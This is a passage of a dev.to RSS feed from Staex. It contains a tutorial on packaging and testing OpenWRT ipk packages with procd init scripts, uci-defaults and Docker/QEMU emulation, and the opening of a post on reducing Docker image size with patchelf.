    uci &lt;span class="nt"&gt;-q&lt;/span&gt; delete firewall.mcc &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;
    &lt;span class="p"&gt;;;&lt;/span&gt;
&lt;span class="k"&gt;esac&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Pre-delete scripts
&lt;/h2&gt;

&lt;p&gt;This is the right place to stop your services before the package is deleted. Again, to distinguish between a package update and package removal you need to check the first argument of the script.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/sh&lt;/span&gt;
&lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$1&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="k"&gt;in
&lt;/span&gt;0 &lt;span class="p"&gt;|&lt;/span&gt; remove&lt;span class="p"&gt;)&lt;/span&gt;
    /etc/init.d/myapp stop &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;
    &lt;span class="p"&gt;;;&lt;/span&gt;
&lt;span class="k"&gt;esac&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Init scripts
&lt;/h2&gt;

&lt;p&gt;OpenWRT uses &lt;a href="https://openwrt.org/docs/techref/procd"&gt;procd&lt;/a&gt; as the init system — the PID 1 process that launches all other processes in the system on boot. Procd is similar to SysV init, systemd, OpenRC etc.; however, the syntax of the scripts is different. Here is an example of an init script for a typical application that does not daemonize itself and writes logs to the standard output and standard error streams.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/sh /etc/rc.common&lt;/span&gt;
&lt;span class="nv"&gt;USE_PROCD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1
&lt;span class="nv"&gt;START&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;98 &lt;span class="c"&gt;# start order&lt;/span&gt;
&lt;span class="nv"&gt;STOP&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;99 &lt;span class="c"&gt;# stop order&lt;/span&gt;
start_service&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    procd_open_instance
    procd_set_param &lt;span class="nb"&gt;command&lt;/span&gt; /usr/bin/myapp &lt;span class="c"&gt;# run the command without daemonizing&lt;/span&gt;
    procd_set_param respawn 0 7 0 &lt;span class="c"&gt;# respawn after 7 seconds delay&lt;/span&gt;
    procd_set_param stdout 1 &lt;span class="c"&gt;# redirect stdout to syslog&lt;/span&gt;
    procd_set_param stderr 1 &lt;span class="c"&gt;# redirect stderr to syslog&lt;/span&gt;
    procd_close_instance
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Procd has a lot of features, including process jails, capabilities, etc., that are documented on the &lt;a href="https://openwrt.org/docs/guide-developer/procd-init-scripts"&gt;OpenWRT website&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;First-boot scripts
&lt;/h2&gt;

&lt;p&gt;OpenWRT firmware can come with packages pre-installed, and in this case the right place to generate firewall rules is a &lt;em&gt;uci-defaults&lt;/em&gt; script. Such scripts are placed in the &lt;code&gt;/etc/uci-defaults&lt;/code&gt; directory and are executed on the first system boot. After successful execution they are deleted by the system. These scripts do not receive any special arguments, and generally you repeat the post-install script contents there.&lt;/p&gt;
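&lt;p&gt;A minimal &lt;em&gt;uci-defaults&lt;/em&gt; script is therefore just the post-install logic without any argument handling. The following sketch mirrors the firewall rule from the post-install example above (&lt;code&gt;myapp&lt;/code&gt; and the rule values are placeholders), written as separate &lt;code&gt;uci&lt;/code&gt; commands:&lt;/p&gt;

```shell
# /etc/uci-defaults/99-myapp: executed once on the first boot, then deleted.
uci -q add firewall rule
uci -q set firewall.@rule[-1].dest_port='1234'
uci -q set firewall.@rule[-1].src='*'
uci -q set firewall.@rule[-1].name='Allow-MyApp-any'
uci -q set firewall.@rule[-1].proto='udp tcp'
uci -q set firewall.@rule[-1].target='ACCEPT'
uci -q set firewall.@rule[-1].enabled='0'
uci -q commit firewall
exit 0  # a non-zero exit code keeps the script around for the next boot
```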

&lt;p&gt;Beware that distributing your package as part of OpenWRT firmware image means that your clients would not be able to reclaim free disk space by deleting the package: it will be deleted only in the overlay file system, but not in the underlying real file system.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Persist files across system upgrades
&lt;/h2&gt;

&lt;p&gt;Usually OpenWRT firmware is updated separately from the packages using the &lt;code&gt;sysupgrade&lt;/code&gt; command. By default all the configuration files (those you specified in the &lt;code&gt;CONTROL/conffiles&lt;/code&gt; file) are retained during the upgrade; however, your application might generate other files that you want to persist as well. To do so, simply add a &lt;code&gt;/lib/upgrade/keep.d/myapp&lt;/code&gt; file to your package that lists all the directories and files that need to be persisted during the upgrade.&lt;/p&gt;

&lt;p&gt;The following file lists &lt;code&gt;/etc/myapp&lt;/code&gt; directory as the one that should be persisted during the system upgrade.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;/etc/myapp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Package contents
&lt;/h2&gt;

&lt;p&gt;The final package contents would look like the following.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
├── conffiles &lt;span class="c"&gt;# files that are persisted during system upgrade and that are not overwritten by package update&lt;/span&gt;
├── control &lt;span class="c"&gt;# package metadata&lt;/span&gt;
├── etc
│   ├── init.d
│   │   └── myapp &lt;span class="c"&gt;# init script&lt;/span&gt;
│   ├── myapp
│   │   └── myapp.conf &lt;span class="c"&gt;# app configuration&lt;/span&gt;
│   └── uci-defaults
│       └── myapp &lt;span class="c"&gt;# the script that runs on the first boot&lt;/span&gt;
├── lib
│   └── upgrade
│       └── keep.d
│           └── myapp &lt;span class="c"&gt;# the list of files that are persisted during system upgrade&lt;/span&gt;
├── postinst &lt;span class="c"&gt;# post-install script&lt;/span&gt;
├── postrm &lt;span class="c"&gt;# post-delete script&lt;/span&gt;
├── prerm &lt;span class="c"&gt;# pre-delete script&lt;/span&gt;
└── usr
    └── bin
        └── myapp &lt;span class="c"&gt;# application executable binary&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Most of the contents can be generated with the &lt;em&gt;fpm&lt;/em&gt; tool using the &lt;em&gt;deb&lt;/em&gt; format as the output. Then the following script converts the &lt;em&gt;deb&lt;/em&gt; package into an &lt;em&gt;ipk&lt;/em&gt; package.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/sh&lt;/span&gt;

cleanup&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;

&lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-ex&lt;/span&gt;
&lt;span class="nb"&gt;trap &lt;/span&gt;cleanup EXIT
&lt;span class="nv"&gt;workdir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;mktemp&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/deb &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk/CONTROL
&lt;span class="nb"&gt;cd&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/deb
&lt;span class="c"&gt;# unpack deb package&lt;/span&gt;
ar x &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$1&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="nb"&gt;tar&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk &lt;span class="nt"&gt;-xf&lt;/span&gt; data.tar.gz
&lt;span class="nb"&gt;tar&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk/CONTROL &lt;span class="nt"&gt;-xf&lt;/span&gt; control.tar.gz
&lt;span class="c"&gt;# remove generated files&lt;/span&gt;
&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk/CONTROL/md5sums
&lt;span class="c"&gt;# patch architecture for OpenWRT&lt;/span&gt;
&lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s1"&gt;'s/Architecture: amd64/Architecture: x86_64/g'&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk/CONTROL/control
&lt;span class="c"&gt;# write ipk to /tmp&lt;/span&gt;
opkg-build &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk /tmp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
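
&lt;p&gt;For completeness, the &lt;em&gt;deb&lt;/em&gt; package fed into this script could be produced from a staging directory with &lt;em&gt;fpm&lt;/em&gt; roughly as follows; the package name, version, and file layout are hypothetical:&lt;/p&gt;

```shell
# Sketch: build a deb from ./rootfs, a directory that mirrors the package
# contents shown above (etc/, lib/, usr/ plus the maintainer scripts).
fpm -s dir -t deb \
    --name myapp --version 1.0.0 --architecture amd64 \
    --config-files /etc/myapp/myapp.conf \
    --after-install postinst.sh \
    --before-remove prerm.sh \
    --after-remove postrm.sh \
    --chdir ./rootfs .
```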



&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;How to test OpenWRT package with Docker
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frxl144yh58ilhw6nidj7.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frxl144yh58ilhw6nidj7.jpg" alt="Photo by Nick de Partee on Unsplash." width="640" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Like any other major Linux distribution, OpenWRT maintains &lt;em&gt;rootfs&lt;/em&gt; &lt;a href="https://hub.docker.com/r/openwrt/rootfs"&gt;Docker images&lt;/a&gt; of its root file system, with a separate image for each target architecture. The documentation is on &lt;a href="https://github.com/openwrt/docker"&gt;GitHub&lt;/a&gt;. There is a separate tag for each architecture and OpenWRT version combination. There are also &lt;em&gt;sdk&lt;/em&gt; and &lt;em&gt;imagebuilder&lt;/em&gt; images that are useful for building the package and for building a firmware image with the package pre-installed, but we will not discuss them here.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Testing packages for host architecture
&lt;/h2&gt;

&lt;p&gt;Rootfs images are useful to test your package installation and removal without investing in a router running OpenWRT (although you should definitely invest in such a device to get comfortable with system upgrades, the web UI, etc.). To install and remove the package use the following commands.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 docker run &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; &lt;span class="nt"&gt;-v&lt;/span&gt; /tmp:/tmp openwrt/rootfs


BusyBox v1.36.1 &lt;span class="o"&gt;(&lt;/span&gt;2024-01-22 12:01:31 UTC&lt;span class="o"&gt;)&lt;/span&gt; built-in shell &lt;span class="o"&gt;(&lt;/span&gt;ash&lt;span class="o"&gt;)&lt;/span&gt;

🌊 opkg update
...
🌊 opkg &lt;span class="nb"&gt;install&lt;/span&gt; /tmp/myapp.x86_64.ipk
Installing myapp &lt;span class="o"&gt;(&lt;/span&gt;1.0.0&lt;span class="o"&gt;)&lt;/span&gt; to root...
Configuring myapp.
🌊 opkg remove myapp
Removing package myapp from root...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Docker by default pulled and ran the &lt;code&gt;openwrt/rootfs&lt;/code&gt; image that matches the host machine's architecture (x86_64). Then we updated the package index and installed our application from the &lt;code&gt;/tmp&lt;/code&gt; directory mounted from the host.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Testing packages for non-host architecture
&lt;/h2&gt;

&lt;p&gt;Testing for an architecture other than the host's is more involved and requires emulation. Luckily for us, &lt;a href="https://www.qemu.org/"&gt;QEMU&lt;/a&gt; and Linux's &lt;a href="https://docs.kernel.org/admin-guide/binfmt-misc.html"&gt;binfmt_misc&lt;/a&gt; make it easy to do so (and without Docker even noticing!).&lt;/p&gt;

&lt;p&gt;QEMU is a tool that runs virtual machines on the host, and the most useful feature it has for us is the ability to transparently execute binary files compiled for an architecture other than the host's architecture. The following commands show how to do that on Ubuntu 22.04.3 LTS.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# install QEMU binaries that were statically compiled for each supported architecture&lt;/span&gt;
🌊 apt-get &lt;span class="nb"&gt;install &lt;/span&gt;qemu-user-static
&lt;span class="c"&gt;# list all available QEMU binaries&lt;/span&gt;
🌊 &lt;span class="nb"&gt;ls&lt;/span&gt; /usr/bin/qemu-&lt;span class="k"&gt;*&lt;/span&gt;static
...
/usr/bin/qemu-aarch64-static
...
/usr/bin/qemu-mips-static
...
&lt;span class="c"&gt;# execute a file compiled for mips&lt;/span&gt;
🌊 qemu-mips-static /tmp/file-compiled-for-mips
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To execute the binary compiled for architecture &lt;em&gt;X&lt;/em&gt; you just add &lt;code&gt;qemu-X-static&lt;/code&gt; before the command and that's it.&lt;/p&gt;

&lt;p&gt;Linux's support for miscellaneous binary formats (&lt;em&gt;binfmt_misc&lt;/em&gt;) allows us to execute such binaries without specifying any QEMU command. Upon execution the kernel detects the actual executable format of the file and executes it via the matching QEMU binary. The matching QEMU binaries and the «magic» bytes that distinguish a particular format from all others are specified in the &lt;code&gt;/proc/sys/fs/binfmt_misc&lt;/code&gt; directory. On Ubuntu 22.04.3 LTS this directory is populated automatically after the &lt;code&gt;qemu-user-static&lt;/code&gt; package is installed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 &lt;span class="nb"&gt;ls&lt;/span&gt; /proc/sys/fs/binfmt_misc
...
qemu-mips
...
qemu-aarch64
...
🌊 &lt;span class="nb"&gt;cat&lt;/span&gt; /proc/sys/fs/binfmt_misc/qemu-mips
enabled
interpreter /usr/libexec/qemu-binfmt/mips-binfmt-P
flags: POCF
offset 0
magic 7f454c46010201000000000000000000000200080000000000000000000000000000000000000000
mask ffffffffffffff00fefffffffffffffffffeffff0000000000000000000000000000000000000020
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now to run a foreign binary you don't need anything special: it runs the same way as a native binary on the system.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# you need matching entry in /proc/sys/fs/binfmt_misc for this to work&lt;/span&gt;
🌊 /tmp/file-compiled-for-mips
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since Docker is not a virtualization platform but a process isolation tool, &lt;em&gt;binfmt_misc&lt;/em&gt; and QEMU allow you to transparently run Docker images that were built for other architectures. Again, you don't need anything special to do that. The following command runs the OpenWRT &lt;em&gt;rootfs&lt;/em&gt; image for the MIPS architecture.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 docker run &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; &lt;span class="nt"&gt;-v&lt;/span&gt; /tmp:/tmp openwrt/rootfs:mips_24kc
Unable to find image &lt;span class="s1"&gt;'openwrt/rootfs:mips_24kc'&lt;/span&gt; locally
mips_24kc: Pulling from openwrt/rootfs
2dd8ebde9a90: Pull &lt;span class="nb"&gt;complete
&lt;/span&gt;Digest: sha256:58d0bf8e15559e0a331e23915ed0221d678c8b2a569c58c0fa25a4f991e4beca
Status: Downloaded newer image &lt;span class="k"&gt;for &lt;/span&gt;openwrt/rootfs:mips_24kc
WARNING: The requested image platform &lt;span class="o"&gt;(&lt;/span&gt;linux/mips_24kc&lt;span class="o"&gt;)&lt;/span&gt; does not match the detected host platform &lt;span class="o"&gt;(&lt;/span&gt;linux/amd64/v4&lt;span class="o"&gt;)&lt;/span&gt; and no specific platform was requested


BusyBox v1.36.1 &lt;span class="o"&gt;(&lt;/span&gt;2024-01-26 09:19:40 UTC&lt;span class="o"&gt;)&lt;/span&gt; built-in shell &lt;span class="o"&gt;(&lt;/span&gt;ash&lt;span class="o"&gt;)&lt;/span&gt;

🌊 &lt;span class="nb"&gt;grep &lt;/span&gt;ARCH /etc/os-release
&lt;span class="nv"&gt;OPENWRT_ARCH&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"mips_24kc"&lt;/span&gt;
🌊 opkg update
...
🌊 opkg &lt;span class="nb"&gt;install&lt;/span&gt; /tmp/myapp.mips_24kc.ipk
Installing myapp &lt;span class="o"&gt;(&lt;/span&gt;1.0.0&lt;span class="o"&gt;)&lt;/span&gt; to root...
Configuring myapp.
🌊 opkg remove myapp
Removing package myapp from root...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Docker warns that the image's architecture does not match the host's, but still successfully runs the image. This is where the power of QEMU and &lt;em&gt;binfmt_misc&lt;/em&gt; shows itself.&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Conclusion
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbpess80j5vfn2run8qsf.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbpess80j5vfn2run8qsf.jpg" alt="Photo by Justin Wilkens on Unsplash." width="640" height="360"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Building OpenWRT packages is similar to building packages for any other Linux distribution, but there are unique requirements if you want to integrate your package with the rest of the system.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Generate firewall rules in post-install and &lt;em&gt;uci-defaults&lt;/em&gt; scripts and delete them in post-delete script.&lt;/li&gt;
&lt;li&gt;List files (in addition to configuration files) that need to be preserved during system upgrades in &lt;code&gt;/lib/upgrade/keep.d/myapp&lt;/code&gt; file.&lt;/li&gt;
&lt;li&gt;Write &lt;em&gt;procd&lt;/em&gt;-compatible init script.&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;opkg-build&lt;/code&gt; to generate ipk/opk package.&lt;/li&gt;
&lt;li&gt;Optionally, use &lt;em&gt;fpm&lt;/em&gt; tool to generate &lt;em&gt;deb&lt;/em&gt; package and then convert it to &lt;em&gt;ipk/opk&lt;/em&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Testing OpenWRT packages is also very similar to other Linux distributions, provided that you have installed QEMU and use the &lt;em&gt;binfmt_misc&lt;/em&gt; kernel feature to transparently run foreign binaries on your host. OpenWRT maintains root file system images for each combination of version and architecture, all of which you can run directly on your host and in your CI/CD pipeline.&lt;/p&gt;
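
&lt;p&gt;On CI runners where &lt;code&gt;qemu-user-static&lt;/code&gt; cannot be installed as a system package, a common approach is to register the binfmt_misc handlers with a privileged helper container; the helper image below is a popular community choice, not something prescribed by OpenWRT:&lt;/p&gt;

```shell
# Sketch: register QEMU binfmt_misc handlers on the Docker host once,
# after which foreign-architecture images run transparently.
docker run --rm --privileged multiarch/qemu-user-static --reset -p yes
docker run --rm -it openwrt/rootfs:mips_24kc
```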

&lt;p&gt;&lt;em&gt;We at Staex help our clients make IoT devices first-class citizens in their private networks, protect from common attacks, reduce mobile data usage, and enable audacious use cases that were not possible before.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://staex.io/blog/subscribe"&gt;Subscribe to our newsletter&lt;/a&gt; to get more content like this.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>docker</category>
      <category>devops</category>
      <category>openwrt</category>
    </item>
    <item>
      <title>How to reduce Docker image size for IoT devices</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Tue, 16 Jan 2024 12:00:00 +0000</pubDate>
      <link>https://dev.to/staex/how-to-reduce-docker-image-size-for-iot-devices-3a34</link>
      <guid>https://dev.to/staex/how-to-reduce-docker-image-size-for-iot-devices-3a34</guid>
      <description>&lt;p&gt;IoT devices sometimes have too little resources to pull and run heavyweight Docker images. In this article we show how to reduce the size by &lt;strong&gt;36-91%&lt;/strong&gt; using patchelf and strace tools without recompiling containerized applications. We also show how to build minimal images for your own Rust, Go, C/C++ applications.&lt;/p&gt;

&lt;h1&gt;
  
  
  Table of contents
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;Why reduce Docker image size?&lt;/li&gt;
&lt;li&gt;
Patchelf.

&lt;ul&gt;
&lt;li&gt;
Motivating example: Stubby.&lt;/li&gt;
&lt;li&gt;
Results.&lt;/li&gt;
&lt;li&gt;
Limitations.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
Strace.

&lt;ul&gt;
&lt;li&gt;
Motivating example: Home Assistant.&lt;/li&gt;
&lt;li&gt;
Results.&lt;/li&gt;
&lt;li&gt;
Limitations.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
Your own images.

&lt;ul&gt;
&lt;li&gt;
Rust static binaries.&lt;/li&gt;
&lt;li&gt;
Go static binaries.&lt;/li&gt;
&lt;li&gt;
C/C++ static binaries.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
Conclusion.&lt;/li&gt;
&lt;/ul&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Why reduce Docker image size?
&lt;/h1&gt;

&lt;p&gt;Docker image size and the number of layers affect how much memory and disk space a device needs to pull and unpack the image. Devices like the Raspberry Pi Zero have too few resources to pull and unpack an image like Home Assistant's, yet have more than enough resources to actually run it. Reducing the size improves Docker performance in such use cases. Including only the files that are actually used by the application also helps reduce the attack surface. This benefit goes beyond IoT devices and is applicable to servers as well.&lt;/p&gt;

&lt;p&gt;It is easy to reduce the image size of containerized applications that you developed yourself: just compile a static binary and include only this file in the final image. For third-party applications, however, there are several approaches that do not require recompilation.&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Patchelf
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm0b6o8t64ys5fcz3e7rc.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm0b6o8t64ys5fcz3e7rc.jpg" alt="Photo by Craig McLachlan on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If the application in question is compiled into an &lt;a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format"&gt;ELF&lt;/a&gt; binary (usually this is the case for C, C++, Fortran, Rust, Go, etc.), you can use the &lt;code&gt;patchelf&lt;/code&gt; tool to find all the libraries that the application uses and copy them into the final image.&lt;/p&gt;

&lt;p&gt;ELF — the Executable and Linkable Format — specifies the program interpreter path (e.g. &lt;code&gt;/lib64/ld-linux-x86-64.so.2&lt;/code&gt; on the x86_64 platform) and the runtime search path, abbreviated as rpath (e.g. &lt;code&gt;/lib64&lt;/code&gt;), among a multitude of other metadata.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;program interpreter&lt;/strong&gt; is used to dynamically load an ELF file and all its dependencies (libraries) into memory and execute it. On Linux you can do this manually: &lt;code&gt;/lib64/ld-linux-x86-64.so.2 /bin/sh&lt;/code&gt; is a «shortcut» for just &lt;code&gt;/bin/sh&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;runtime search path (rpath)&lt;/strong&gt; is used by the program interpreter to find the dependencies. On most Linux distributions (Guix and Nix are the only exceptions that I know of) this path is empty and the interpreter searches for dependencies in hard-coded paths (e.g. &lt;code&gt;/lib64&lt;/code&gt;).&lt;br&gt;
We use the &lt;code&gt;patchelf&lt;/code&gt; tool to modify the interpreter and rpath, and &lt;code&gt;readelf&lt;/code&gt; to inspect the ELF file. Another useful tool is &lt;code&gt;ldd&lt;/code&gt;: it shows both the interpreter and all the dependencies.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Debian&lt;/span&gt;
🌊 readelf &lt;span class="nt"&gt;--headers&lt;/span&gt; /bin/sh | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A2&lt;/span&gt; INTERP
  INTERP         0x0000000000000318 0x0000000000000318 0x0000000000000318
                 0x000000000000001c 0x000000000000001c  R      0x1
      &lt;span class="o"&gt;[&lt;/span&gt;Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
🌊 readelf &lt;span class="nt"&gt;--dynamic&lt;/span&gt; /bin/sh | &lt;span class="nb"&gt;grep &lt;/span&gt;RUNPATH
🌊 patchelf &lt;span class="nt"&gt;--set-interpreter&lt;/span&gt; /lib/ld-linux-x86-64.so.2 &lt;span class="nt"&gt;--set-rpath&lt;/span&gt; /lib /path/to/some/elf/binary
🌊 ldd /bin/sh
        linux-vdso.so.1 &lt;span class="o"&gt;(&lt;/span&gt;0x00007ffce0f91000&lt;span class="o"&gt;)&lt;/span&gt;
        libc.so.6 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /lib/x86_64-linux-gnu/libc.so.6 &lt;span class="o"&gt;(&lt;/span&gt;0x00007fedf9b66000&lt;span class="o"&gt;)&lt;/span&gt;
        /lib64/ld-linux-x86-64.so.2 &lt;span class="o"&gt;(&lt;/span&gt;0x00007fedf9d6d000&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



